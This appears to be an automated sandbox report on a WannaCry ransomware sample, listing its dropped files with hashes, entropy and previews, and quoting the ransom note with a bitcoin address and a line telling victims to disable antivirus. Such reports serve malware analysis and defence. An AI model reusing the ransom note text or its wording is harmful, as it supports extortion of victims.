\|j]..h.~......\..S....4..c.%.H.#.....[..Q..g....3......>...Iv.:h..$......4....u....E...'E;V....l7...ip]Q....B~.k.\|....TL..H.&..m...l..)e..i_...._D.7....:R...b.u.R.f......g~..J.....p.h.\|..D4I.Z&..o...'........XI...3.e+\|..kI.m...B.3....).B!.t!......h.z.0....8.\P.K...G)p..:Q...y...J.........u.........so."..K...-..G$.:gO..8.8{?.8.t....G.G.0G'.E.....h..I.)xw....%m..Z.-.N...+J.<...-e..C...4z..~.}.4.....h...........O....H.+*...i.XX..`{#.m......~....e.[..&.g..8.gM...0.... .k..46..C..4f.&.fO3.i....R..1....G%

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\AlternateServices.txt.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	888
Entropy (8bit):	7.764427432287436
Encrypted:	false
SSDEEP:	24:bk9NTgxxYVXIoSgZwxz01LeeN0iga8+IePlkLA/:bk9GxqaRUeWuigPfCmA/
MD5:	E2B331BE61AFFAC8A3E60A830FC13B76
SHA1:	0B1C705A9600AE8A6A6717A0D3DBAC5D25FBCACA
SHA-256:	05D60EA00D4F14A0CB0A0187D4BFB20BA0C816B06D2788563A53B8515043F79F
SHA-512:	253F472D0EF3A791C42293015F76C5BD17253DC528210B748D7749250ECA7674048E2BDB35782D70B753643D5D5AEDE70DACB5FACE0128CF1CE01AFA0B97104B
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!.......u.I.E.:...y).H.xt....m:M......]..T.d....f..)8.Z,.HF8.u.[..o.`...~..}..\|....+.F..o..Iw>.'.....vWnY..Q...Ew....fu......0.....q..3s..v.%.0.?nm.%...2.0.~...1..Y....92....II8.J..[V..N-.%...}l..........=......8.YB....../O.....\|....y.n....X..........$...Z<.......r....AV... A-.tY.f.....j..;{..&.y._.....\....4.\KT...^..d7"=.S.KHtj...t.&.D.....EFV28.U...............:.:..\'....jY2R..9...4...LU.+r.~i.....f.....K.{..`.bf..z.(...!../....~^H.C.v.$.`...^.\....4M..Y../J.....54R...3e....l..~.......j.V../.........w.......0f..z.J..He...~.!mIY........6....G.[........OK...KO.84K .....h......2.U..)sv...2PD..4...o...fc.Z.=. P.O}.......JX.-...[5dO......O.V.37..'...n)C.3yJo.g..A...qNr&<.N..CL.3.>.=L......L...X..n..T-$:.....fn.9.2\|..R..\|..W]...L..GGdw$EP..U5......."....Mz.$&\|.n....BP...o;...%....`i-..K~.P..Q{'..J.......dx.........

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\SiteSecurityServiceState.txt.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	888
Entropy (8bit):	7.737478483077716
Encrypted:	false
SSDEEP:	24:bkp3uHZibwBODHSEpSV+K0ENx/PZsiDEU0kJomsn:bkokSEoV+K0Axps0ExQohn
MD5:	A804584A50AA9B10AF0DBAA4802FC34B
SHA1:	FB742A8E197DBF7A13CD27EFD8873BF7E2724EB4
SHA-256:	38041BDADCA49E7B4BBEBDDA66D6943B589232C52439320E9688CAF44030327E
SHA-512:	0EDA12B53F7F5ED2528E5790701819B7B0736987FF77C1881FE5F6389F427E8148AA4E9F15686F3DBF7F72F884F31F462AE550CC8E52B7F9CB0E06EC9274D912
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!.......:.d....)....ErA.$.......q7.8S.8..I..J.!...4."D.<..~..6E.G_<.G..R/S....R..1..67...Pv.....#i ...;;.[..`Q._..Fk.....f.X.x.....V.q.\|w.).. dt...=.._3..^..yu...iL.\.....>......)...lS..G.d..dN'.z6K.5\|.}.F......TBPE...7...0 .9 .....L..r..I..o.N$e.....W.......>.....$r4. ......`...e.p.d}..u>.u...{.DK..1Zjn5....dU.4...c.8..).Y..@.L...\|.[.0\|....I.y..,..)I.5...........j..)m..........u?.gs.H.~....?.....Y.....)..Y.....J....>.G..,A<H.u.s%U.../.oPnZ...mg.......i.-.^.....I..=Q.S.XL.5.T..Cz0.W.=.\|.c.....1.....K.y....1.i...Z$..VyUg...Fg......./dC..........c.......U..B.pz..fc..I..(...?}..{@.N.".-..h_.y.......z0I..C..P;.w.j......Z2.Y....q...Q...t.....RW.T.Ud.....L<......N%%&.../(...f...52\...C........p..._r....j......J..u.U2'.G....Ij...E..V..Y.1..Bd....4L?B.Y.......j..r....y...N.G...M2.b....<.S....U`...,X..`..o.#(..`..8.n.q...&..d(..b.y..

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\cert9.db.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	229656
Entropy (8bit):	7.999117180631049
Encrypted:	true
SSDEEP:	6144:vQVIScbtRVnLwMK51tfGcUko8oWZwyh+Ni7r4:vQeS6tsGHp8RDL70
MD5:	2E6D7BB20DEC274C9AEF395E052C9067
SHA1:	690E52809ADD2E90D35D50CDF74F0E23A5C5E50E
SHA-256:	6F3652E38BB116B3003875C2FF82EEBB5F42E5746BC1BE9F78F516F95F0787A0
SHA-512:	20CDC849C7C4ECD31746DAAF0E66D703FA70BA6A0160DF2172F388E98795CE5CD49B0DEDFDF6A9D54F9E0596BD247A5DC2964C7B6496808F5DF4A39447AA0F99
Malicious:	true
Reputation:	unknown
Preview:	WANACRY!....:.wYZSb.9^2....c..Gl.q...6!F%\|=.\....`.....>n........RK.@i\|~v.L..h.Ey.S.<.....F...b......sw..y.w.%n.6].?..QM.h u......ZT"........q....(.Vn../.(.....X..dH^..m..b..[.^s-...8...W~.8j..c.............\|...4..^..Q.".kQ...s.dt..X.....T.6ax...=r..b...................\|..p..:(E.7...=..S.;;%."}.p..D.^e..'..>....y.<.....C:....4.Zr.......o..u^\..;.Bg.A)....o{bwM..O....ol...g9h..C#..y..2l..q....:s..kH`.Q......zxt..y.v.u..(.!e_k8Y..Y..#i.g...}1]K..C.J.."cX.@.Wt.(uod]....Zq.'(....L..0!..z.....t?.'t....6F.@....._./.S...e...(.;.^...w...c..~...y.W..P.6..y3"6.8iXC..\|'...u.....4....>....R..r.....K.\|>...........p....K...N.,...v..].\+.%.P.dL...J..\|.L..].XJ.;i.......H..m.-$^....YL.]....s..#I....d..<....v.......0(.\|."A.&.....!I....U..A@.....-.5.?)n..-n.0.....(....sE.....)q.Wna.1.R.g..OjcN2..........?)....B....I.tj.mEQ..Q8.y..,...Q.....1......w.<..\|..Z-....1.......5.tn..c.6h.T...3.o.z.'...;J..........-(...Mh..~....Z...'m.$ .[..0#@"G}..WO_.,.bc'....~....Y.

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\gmp-widevinecdm\4.10.2209.1\LICENSE.txt.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	760
Entropy (8bit):	7.709538313980208
Encrypted:	false
SSDEEP:	12:bkEj1SnWB8B/xSFBMl5dvylk2h/5/4agNeXwFyNbDeM7aRscGbXRTXgpy14CiUM:bkrnWmB/KBM5Yk2JR0QT2ecy74bUM
MD5:	948FEB366DFBF83F583C29D663C8F9D2
SHA1:	9957DAF494DB2E4430582BF7AE4C271470CD67E6
SHA-256:	E1FE2FC11C8F39B4D5D4C29C4748CC088FF292B94610E7ADDDA587529C1DCC4B
SHA-512:	BE05DA8B6CD6A06EED55F065A41E487E22122BE91888C2B2BADD88FEB07C364C6398FF753FD764B1DD8774C1E72232E776573103669D3CFDF62A091195CA5A28
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!..... ....q..t%.$.O.N.z(..SM.q.!..RD..9..2H..a...;...!n..e....p..j.y.......<..6[..C....Z..T.:[.....y....<ib(.P].....V...I.z.Y."..V..,.S..........d(4."}5.$....H....%.lvN&.M.M42...W.t0+&S..=.7..........:....i.+...l.$.0..0..t.......Ld...`.p.'......ne............}..m.BK..G......i..m.,N.q....R.>#..$.r:/.....<.m.p.R,Q.V.~N...Zd.n...R...... s...(...u(..=.D).h.v4...~......F.`....}.v.@y.@S.h.\|./lw.U..8.4...j..uR.i.....[.[S54b..Q......X("u..4..w.h....g..E.E......$../-G.=}...@.\|........#)....}Iy.2....U.c.....^...."&.`@8....!....0.\.'...Kl...lK...."[F...+..Z..\..A.....a.....[..s...:.$.o...l[..R.y.b..r.C..,z.`.........m...T..n.<.....(...n8.K............X...vW..S....Ws....4si...d.-.....uc.....M..+.2.7....}"....c.Du..Si

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\key4.db.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	295192
Entropy (8bit):	7.999338042402126
Encrypted:	true
SSDEEP:	6144:GSn5MGVNcc/ssWGgWQVFjX/PAP1xPRfOUMUj8qBo7zV7u9F4tLe:LnmG3cMsvS+F7nAPnPR2Um4o/ZtS
MD5:	F4C82BB807166641FAD1D636257C7F0D
SHA1:	95EAAF6E78E4A1D1C59A90BE8C9B9F1D72E662FE
SHA-256:	9D22E1F5C88DF69648F0DAEE7B1AA2C36249837CC41E3CDD13CBCFD447E3A4F6
SHA-512:	445AADC7BDF7C3F2E8E02235D45FED8502C4C89F375E6AB1B3822E992BFFE797E59F06B72990416C8C35550FED82EE72A0CE35264681794201873C0EC30C3659
Malicious:	true
Reputation:	unknown
Preview:	WANACRY!.....\..o.....E._.]R..[... Y28!B....,..c...Zu.......[...{..../..}..g.R.1....{......b}....w.#....-9Q...9~{..d.M....`..~1%...`.....O.......W:.:i.".P...:...H.nCFJ...8...v..sSI....(B.u>]. Z....f..?.`. .2.....7........i..C.I.J@..^^..X../.%.n.u>......................g.e.15..7...d..<.......e{;.s....b..Z...b.............&`.k.5}J.[.X.K...h.S.........MQ......j.w.?...u..&.`[.S.G..O....3....H....h....{.MD$..Gr%.9.\...Xe..O..J&.)....K-.z..!..............`.6.....{.Vu)...\v.....K..J..^K_.%...o.<...#.!.l...C.Z...4....}.(..S^..O. -...2#..ylo.B..d...F.83i%.m.UA\.Q:$.!...D...G...`...5aLe...a...h1..Z..^..~..",.Q...'....d.o....zTL.. .x.z..W.C)..O.L&!.\M..z.+F..L.wG..=...lt...7I..V.....FgOkA....@..Z.eL\|lm!....n96.-.e.L>.........=..S..'....#_.o.........\|,dFJ.....'.\|..>f..d..}.W.,.:...Y..'?.rn.#<.........e.t..B ...^..f.p.)....Q..,..d>.;.RH../=.)..i!.p.a....j.............J..j..d~..3....!......"LJ.I....'.V,a....Y..p..}\..38..X.%.r......5A.hJw.o..I..Q.*......

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\pkcs11.txt.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	792
Entropy (8bit):	7.693351380324278
Encrypted:	false
SSDEEP:	12:bkEcKs+lyWjVVQIqTMJJAxr0a3SrxPLg+RpCgPUc1Wdp0OCCwpaF2YQ33ThXgC1w:bkHKs+lycVQ52JAxr1AMSTSw5dwC2
MD5:	0589F22B756E3267162CCE2FA5747815
SHA1:	437A77EFEF1D392317B615C91E35CD4DAD35CDC7
SHA-256:	DA41A6BC6A47E4606529D035E53B6C891E88962657B42A3A9F0E54CE658F7F2C
SHA-512:	54E3E45B2F9CDA0C15AB4AD494800B7CAB5BC809A2848B469A8AE7E38D4FF99E5C0618D8DC9DA934AB39AF018537FFC65544CB12B65117B053DDF7DE38F31C5B
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!.....M.s....I>`~?.ow..vlY....x..o....%.[G-\|...@S.s...{s...I.P.....F............YX..Y...I....7s.y...KO,c.v.....&%..G......C.......E...%T.hBb'h.ck...O.vi....`.........v'.@33......;.:I..#....&...S.}..o;.Z..m\Z..eU.Z...dw@z....t...5Z.0..%f.Rj.2-A..................I.R.U..=.T..-..g...m$...mYo.@.....p;..........F.'3.......XK1x.F.A.....\|.;....3..S.TB..\|.].+oqA.1.).......}..'.-.4...n....N'..h].H(.]...`..,....=k..&...-.. ......uO.T.M......T....".q..Y.O.%......&...S.d0..vLL.k.t.7.......a.["....E.z..!......J.z...dGr...)....O.^.X.,..l&BH....U...QJ..5.....{....x.&.{.......'...2.D-:s...~....m./..O.<.3j....%(..B&..{...q..(...U.....{f.Q.I#Z....0..C.K..Hy.i....{.:{.'..Q.z9.0.s.<r.?..7.....(...Q...L\|.}.GA.....&...Ha....9.'..A/Az..o.<y-B['..q.v.L.K.

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\prefs.js.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	12216
Entropy (8bit):	7.98451375608056
Encrypted:	false
SSDEEP:	192:3QtW6Tc8H4pH4gWI9YE/wyWPgtd9Mcm7+11dCRjS1oA+B7czo8Sbk21W7zZ3P:J6TCH4J5E/wvgtvMK1HCVS1oVBIXSbkr
MD5:	B830C50C1129C4DFA337501F4BE67938
SHA1:	C866F52A64277812FA3D61048851EE8B585EB95A
SHA-256:	53F8B7A492B77A5634236050780C09D8B1E542D47F8E79EBFD0009A83C4911DF
SHA-512:	59A80C0774DC5FF8BB414BF02E187FB0CD20490D4070BF88094070A7C8F014A3AC22F73B785408EC9C1EBB3DA352AC76434A88F44DB0A65D5E2878A7B4202555
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!......~)m)........X.."rVd-.Q..-...)0.A.o......d.?FZ.?R.=.......H...N{...-.aZ..t(....E\|U..@X..F...Z.O..H_.\......JHF}...@.4y7...b.\|.Q..H..qv.@~9^at.4Q.....~9A..4.\|c....aD.E...Q...=4G.....3hhu.T..o..!:R..~.C'.5..0".G#..;..:.g+.0......h..@.rwL..../.l..!S,............C....4TQ.........W.!H&j......x..g?].....p..RCw@.jj..,''>.c8).>.u.,h..7.. ....`.1...._..B<>.{K...A.[../.".h.}2.U......'.[..o...1.6..d../t.It+..X%9...N+...\|QP.6......(UyZ'L&...`.~>..%.Szi.....x.1.l.....#...)...)[yn.n. .n.^.../.o&.P.8..!.Hp<.e.3&...GJ.....'..wOm....7.9l....g.^.....Be....F.-.-.._...L.CS(.....I..........w.t...zMf.1B n..\..,......l-...}?W..j..f......U..l44..T!GR..c".......DSI.=....}.^D.......F..r.p..,s........5>....l...HC6....:&.....*rdr.f..y..%..l}{]-."...s.7<. [bs...y.Y.U....T..yn.v{.Z..3.u.^.#..8..u.(..., r.D.c.yZe...J-..."........;....9....,.......[<.. .t.....x@V..$.H.f......B.Gm.&d..Zs]\.e......+.D{..l.6......_0...5.+\!-b>.l....s...H..Lbx/[....2......'.B)..~%

C:\Users\user\AppData\Roaming\tor\state (copy)

Download File

Process:	C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	222
Entropy (8bit):	4.919163566308113
Encrypted:	false
SSDEEP:	6:SbdWwxXnRnXr87+QVe2vwR/EtbWWURbibfl87:bwxXRXr87HVBvwN2PS
MD5:	C184B98CAC0E5B7FF9AB938E4D3FEBB4
SHA1:	5237F8BE7EF6BD7584101EE4BAB5C33C500D7E3D
SHA-256:	FD3E2FDEBDAF9067D304BEDE54FB7BA51F572D0B4E46D34ADC8DC932CA0394E8
SHA-512:	94C71B66908C4818DD076F8C40762E7CAB79D28398755E2483759E891FD92F18C0DFD639CA1BF99AA24AD76DFB1A88C489E56E0086D97B142DCFFBB7007B6928
Malicious:	false
Reputation:	unknown
Preview:	# Tor state file last generated on 2023-08-16 14:50:44 local time..# Other times below are in UTC..# You do not need to edit this file.....TorVersion Tor 0.2.9.10 (git-1f6c8eda0073f464)..LastWritten 2023-08-16 13:50:44..

C:\Users\user\AppData\Roaming\tor\state.tmp

Download File

Process:	C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	222
Entropy (8bit):	4.919163566308113
Encrypted:	false
SSDEEP:	6:SbdWwxXnRnXr87+QVe2vwR/EtbWWURbibfl87:bwxXRXr87HVBvwN2PS
MD5:	C184B98CAC0E5B7FF9AB938E4D3FEBB4
SHA1:	5237F8BE7EF6BD7584101EE4BAB5C33C500D7E3D
SHA-256:	FD3E2FDEBDAF9067D304BEDE54FB7BA51F572D0B4E46D34ADC8DC932CA0394E8
SHA-512:	94C71B66908C4818DD076F8C40762E7CAB79D28398755E2483759E891FD92F18C0DFD639CA1BF99AA24AD76DFB1A88C489E56E0086D97B142DCFFBB7007B6928
Malicious:	false
Reputation:	unknown
Preview:	# Tor state file last generated on 2023-08-16 14:50:44 local time..# Other times below are in UTC..# You do not need to edit this file.....TorVersion Tor 0.2.9.10 (git-1f6c8eda0073f464)..LastWritten 2023-08-16 13:50:44..

C:\Users\user\Desktop\00000000.pky

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	b.out overlay pure standalone object file V2.3 86 186 286 386 Large Text
Category:	dropped
Size (bytes):	276
Entropy (8bit):	7.180704891435345
Encrypted:	false
SSDEEP:	6:mtNIpnu6lCbbAp4js5ogVJvqy/Mxik0L6+Eu+wtipGun:YjPUpF5ogbjM7l+EcQpGun
MD5:	CEC35A034FCCD95459CD2B15FAC9A0DD
SHA1:	56A4F34769FBF7BC69943D89405042F46EB9D0EC
SHA-256:	36C33D107826551B9993E887D27B4E174889AC578331D06DD7C811E211D28940
SHA-512:	7292ABFF633F0E713DC69871150A252EE64802F032B5261EF76254A207B6E1FCB768C934462CA0D0A3C9039A0A7172FB05471DC6A593F4F4E0E4E1BC8615D292
Malicious:	false
Reputation:	unknown
Preview:	........RSA1........}...+z.._B\|u...&.a.o........<..^...T..........;..s..o...1...h........./.g.Fi..+p\|>..8Ys,.7n&%..L...h.j.6..v:.....p..~.p*....Ju..~...Z...Z......e.R.....3.I.i.^.`.....\|t.6......n.............._w..<..Vc..9L44l....O....6.eF;.(.[.-...j..].A..

C:\Users\user\Desktop\00000000.res

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	136
Entropy (8bit):	1.5087536060306626
Encrypted:	false
SSDEEP:	3:jPtv/XlOn:jPZ/o
MD5:	34551E0870DBA26CE752F0EA9AD06166
SHA1:	3BFED38D9404F445D8240CCDB3547AA84F1F352F
SHA-256:	4BA75387D09326CA6C0666C161E73B419FE7A87282999A7E7883DE2C469E94E9
SHA-512:	3943F3D23BF2AD9D7D943E9C0BA28470E722F8F38EAC6DD0D053BC279B5588DE31B7C16D174C55F325D1E1A49E9DA02F123353F10729D97B157F9C4DE00B06E2
Malicious:	false
Reputation:	unknown
Preview:	.mS..ExR...........................................................................................d...................d0..dd...%[......

C:\Users\user\Desktop\312151692193723.bat

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	320
Entropy (8bit):	7.309535059000209
Encrypted:	false
SSDEEP:	6:omUe5TJQO3XzUctT9RZlIksL6amo3N7WjoJBAxfR+Gpm699v8hmKMFpQ9TNPK0n:oERJQO3XzTPukg6t5o8xfR+GV8wKQETR
MD5:	D99DC62BEA4A72339F825748C68718D7
SHA1:	C64A5CC4CA69D0987D0CACD4F88A02E513B5CBC0
SHA-256:	40638110F524B38CF71DCD0A3E5DA3E2FB5CE113A9F1865A0B54DD67D8BC8C1F
SHA-512:	4B34DA89E9504A5E83AE21D9AD67013C1A74ADC840315249F74B445C9FEFB7638528F41DF64FC5486A5E71953BE25FE7AD4E2ADCC521879EAFE1F34168C8F9C8
Malicious:	false
Reputation:	unknown
Preview:	L.....t.m...U...H....ny..AA...~b#Y..b..HW.Y.......S..B.HJ.5...a!...-..W>.....G..XcK..k.U8......8XQj....+,..b.O.f^..5.....k....,V...I>.9.x......8..9H.....(..d.........O...;....!M^.U.).G+..b..O.J....9(...'.8....:..[.L.........~x..E..........o4.^...C....D...n...48.i..*...J..w[.<H!lM.....Y..5n.Q.d"..Z~

C:\Users\user\Desktop\312151692193723.bat.WNCRY (copy)

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	600
Entropy (8bit):	7.6423103397295895
Encrypted:	false
SSDEEP:	12:bkE9tQBXABglvl0ozhGqOZ6/Cm351GCMxyDiiORKqiLLGl3s9sr8MT:bkv8gtsBVmJ1GjyqYL4QMT
MD5:	AD085DE9D291D0981F5413DC2813F697
SHA1:	609A7CEF4A6315C495827039A83A1E212B8F9C78
SHA-256:	F9B23C8F20C6237CED408F1AA1EA8BB060BD47A5703E47EDC75CAC47D0FE10D1
SHA-512:	BFDEF8DF31E8A59CF7C9C74255837699C57B6E111A941F2E950ADF97F7E82282A6FB6B1C017547A1A8B69C85836257FDE7719BF1DCFD0B77AA1D09A8DFA43687
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!.......)(.G<.}B..D_.#......\.v9}.J%_......z.D..K.....6..7....rBq#.2N..6/y..<..L.4.. ...<......p....9)...... X&1..h...... ...j.r.:.~..{.m@m...)vg.,!a.&..su.....\|....bN.Z...b..U..T..)...jc^...<.[FD.u.l/d.t@..z.GO....tD\DY....;.#.6..{q...Y... ..K....V....@.......L..z._du.@..P...G..5.......f...X...!.k .*..A....MxQ.......T.\|.\.6k.R...`B.T.GU....f.....(..C..))..i..u.....Q...x..t.).66R...H...4!!.nS.3$1...&A.....3...F...W....FH.S1...W......q...n....3.}Zey.....c.&.T..i.`.7(..g..C..`K....X.,..'..^z..-.Q...u....4..TR.....l....=O..\0..Q...U[q\pWV.........6g..v.i.I..U5.

C:\Users\user\Desktop\312151692193723.bat.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	600
Entropy (8bit):	7.6423103397295895
Encrypted:	false
SSDEEP:	12:bkE9tQBXABglvl0ozhGqOZ6/Cm351GCMxyDiiORKqiLLGl3s9sr8MT:bkv8gtsBVmJ1GjyqYL4QMT
MD5:	AD085DE9D291D0981F5413DC2813F697
SHA1:	609A7CEF4A6315C495827039A83A1E212B8F9C78
SHA-256:	F9B23C8F20C6237CED408F1AA1EA8BB060BD47A5703E47EDC75CAC47D0FE10D1
SHA-512:	BFDEF8DF31E8A59CF7C9C74255837699C57B6E111A941F2E950ADF97F7E82282A6FB6B1C017547A1A8B69C85836257FDE7719BF1DCFD0B77AA1D09A8DFA43687
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!.......)(.G<.}B..D_.#......\.v9}.J%_......z.D..K.....6..7....rBq#.2N..6/y..<..L.4.. ...<......p....9)...... X&1..h...... ...j.r.:.~..{.m@m...)vg.,!a.&..su.....\|....bN.Z...b..U..T..)...jc^...<.[FD.u.l/d.t@..z.GO....tD\DY....;.#.6..{q...Y... ..K....V....@.......L..z._du.@..P...G..5.......f...X...!.k .*..A....MxQ.......T.\|.\.6k.R...`B.T.GU....f.....(..C..))..i..u.....Q...x..t.).66R...H...4!!.nS.3$1...&A.....3...F...W....FH.S1...W......q...n....3.}Zey.....c.&.T..i.`.7(..g..C..`K....X.,..'..^z..-.Q...u....4..TR.....l....=O..\0..Q...U[q\pWV.........6g..v.i.I..U5.

C:\Users\user\Desktop\@Please_Read_Me@.txt

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	933
Entropy (8bit):	4.711824502619554
Encrypted:	false
SSDEEP:	24:ptrPzDVR5Gi3OzGm0EigS1xbnGhRQhbrW8PNAi0eEprY+Ai75wRZcet:DZD36W3KghvWmMo+S
MD5:	7A2726BB6E6A79FB1D092B7F2B688AF0
SHA1:	B3EFFADCE8B76AEE8CD6CE2ECCBB8701797468A2
SHA-256:	840AB19C411C918EA3E7526D0DF4B9CB002DE5EA15E854389285DF0D1EA9A8E5
SHA-512:	4E107F661E6BE183659FDD265E131A64CCE2112D842226305F6B111D00109A970FDA0B5ABFB1DAA9F64428E445E3B472332392435707C9AEBBFE94C480C72E54
Malicious:	false
Reputation:	unknown
Preview:	Q: What's wrong with my files?....A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted... If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely!.. Let's start decrypting!....Q: What do I do?....A: First, you need to pay service fees for the decryption... Please send $300 worth of bitcoin to this bitcoin address: 12t9YDPgwueZ9NyMgw519p7AA8isjr6SMw.... Next, please find an application file named "@WanaDecryptor@.exe". It is the decrypt software... Run and follow the instructions! (You may need to disable your antivirus for a while.).. ..Q: How can I trust?....A: Don't worry about decryption... We will decrypt your files surely because nobody will trust us if we cheat users... ....* If you need our assistance, send a message by clicking <Contact Us> on the decryptor window....

C:\Users\user\Desktop\@WanaDecryptor@.bmp

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	PC bitmap, Windows 3.x format, 800 x 600 x 24, image size 1440000, resolution 3779 x 3779 px/m, cbSize 1440054, bits offset 54
Category:	dropped
Size (bytes):	1440054
Entropy (8bit):	0.3363393123555661
Encrypted:	false
SSDEEP:	384:zYzuP4tiuOub2WuzvqOFgjexqO5XgYWTIWv/+:sbL+
MD5:	C17170262312F3BE7027BC2CA825BF0C
SHA1:	F19ECEDA82973239A1FDC5826BCE7691E5DCB4FB
SHA-256:	D5E0E8694DDC0548D8E6B87C83D50F4AB85C1DEBADB106D6A6A794C3E746F4FA
SHA-512:	C6160FD03AD659C8DD9CF2A83F9FDCD34F2DB4F8F27F33C5AFD52ACED49DFA9CE4909211C221A0479DBBB6E6C985385557C495FC04D3400FF21A0FBBAE42EE7C
Malicious:	false
Reputation:	unknown
Preview:	BM6.......6...(... ...X.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\Desktop\@WanaDecryptor@.exe

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	245760
Entropy (8bit):	6.278920408390635
Encrypted:	false
SSDEEP:	3072:Rmrhd5U1eigWcR+uiUg6p4FLlG4tlL8z+mmCeHFZjoHEo3m:REd5+IZiZhLlG4AimmCo
MD5:	7BF2B57F2A205768755C07F238FB32CC
SHA1:	45356A9DD616ED7161A3B9192E2F318D0AB5AD10
SHA-256:	B9C5D4339809E0AD9A00D4D3DD26FDF44A32819A54ABF846BB9B560D81391C25
SHA-512:	91A39E919296CB5C6ECCBA710B780519D90035175AA460EC6DBE631324E5E5753BD8D87F395B5481BCD7E1AD623B31A34382D81FAAE06BEF60EC28B49C3122A9
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 96%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......%...a...a...a......b.......u.......`.....d.......j.......e...W...b...a.......W...s.......`...Richa...................PE..L.....[J.................@...p.......1.......P....@..................................................................................0..\|............................................................................P...............................text....3.......@.................. ..`.rdata..h....P.......P..............@..@.data....2.......0..................@....rsrc...\|....0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\Desktop\@WanaDecryptor@.exe.lnk

Download File

Process:	C:\Windows\SysWOW64\cscript.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 16 12:48:43 2023, mtime=Wed Aug 16 12:48:43 2023, atime=Fri May 12 00:22:56 2017, length=245760, window=hide
Category:	dropped
Size (bytes):	577
Entropy (8bit):	5.130736260231282
Encrypted:	false
SSDEEP:	12:8RWXpzYNbfubUV9nCOTUoBjA9RoTwmQbmCt:8R/4bEcOA9CDQbm
MD5:	EFF1EF4995F8BF6C61B07BA09D6F5B70
SHA1:	3962AE93845DEFBC439B6C727218F3587C07AD5B
SHA-256:	FE6E4230472001768D368ECE27D067A6C7A060DCD37C29F6E763556A83523A02
SHA-512:	900144EE048935C7F38CE7A503C6CB8E4246C97A3F8D254D22725AB03D6CA151D9416AB70D4B094BFA86AEF5C9DFD051EAF559E65FBF4E383FB48088889560E8
Malicious:	false
Reputation:	unknown
Preview:	L..................F.... ....&.^H....&.^H....X.H.................................P.O. .:i.....+00.:...:..,.LB.)...A&...&.......`._....'_H....'_H.....t.2......J.. .@WANAD~1.EXE..X.......W.n.W.n....up........................@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.......Z...............-.......Y............Y~.....C:\Users\user\Desktop\@WanaDecryptor@.exe......\.@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.`.......X.......675052..............n4UB.. .\|..oI..k;<.....P..#.....n4UB.. .\|..oI..k;<.....P..#.E.......9...1SPS..mD..pH.H@..=x.....h....H......c-dSA....n.............

C:\Users\user\Desktop\CZQKSDDMWR.png

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	7.840545290778321
Encrypted:	false
SSDEEP:	12:WLCxQU+FcI8LM4NJQTyhJwJgrSVcTyLasppXzUasYWq4KDhFPuhhJYo+CMiSLrPf:W9U+wvJQfpDUMWqHAhJYkSv4uavS7q8
MD5:	110C040373ED52F7F46CF3C02988D9E4
SHA1:	CD499FDBD64C34E7C182A52B01D677E09419CA83
SHA-256:	6052390076FFF6F3B5E05D328A2A3ECDAD1977D557961E33F9BC3140A3826AB8
